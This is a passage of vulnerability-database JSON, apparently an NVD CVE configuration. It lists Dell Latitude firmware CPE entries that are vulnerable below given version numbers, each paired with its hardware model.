[ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3420:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.17.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3500_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.32.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3500:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3510_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3510:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.35.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3530_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.17.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3530:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3540_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3540:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5280_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.35.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5280:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5288_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.35.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5288:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5290_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.34.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5290:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5290_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.33.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5290_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5300_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.30.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5300:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5300_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.30.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5300_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5310_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.23.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5310:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5310_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.23.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5310_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5320_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.36.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5320:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5330_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5330:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5340_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5340:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5400_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5400:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5401_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.30.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5401:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5410_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.26.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5410:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5411_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.27.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5411:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5414_rugged_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.45.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5414_rugged:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5420_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.36.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5420:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5420_rugged_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.31.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5420_rugged:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5421_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5421:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5424_rugged_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.31.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5424_rugged:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5430_rugged_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.25.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5430_rugged:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5431_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5431:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5480_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.35.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5480:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5488_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.35.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5488:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5490_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.34.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5490:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5491_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.32.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5491:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5495_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.15.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5495:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5500_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5500:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5501_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.30.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5501:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5510_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.26.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5510:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5511_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.27.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5511:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.36.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5521_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5521:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5530_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5530:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5531_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5531:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5540_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5540:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5580_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.35.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5580:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5590_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.34.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5590:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_5591_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.32.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_5591:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7030_rugged_extreme_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.4.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7030_rugged_extreme:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7200_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7200_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7210_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7210_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7212_rugged_extreme_tablet_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.49.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7212_rugged_extreme_tablet:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7220_rugged_extreme_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.35.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7220_rugged_extreme:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7230_rugged_extreme_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7230_rugged_extreme:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7280_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.36.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7280:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7285_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.25.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7285_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7290_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.37.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : 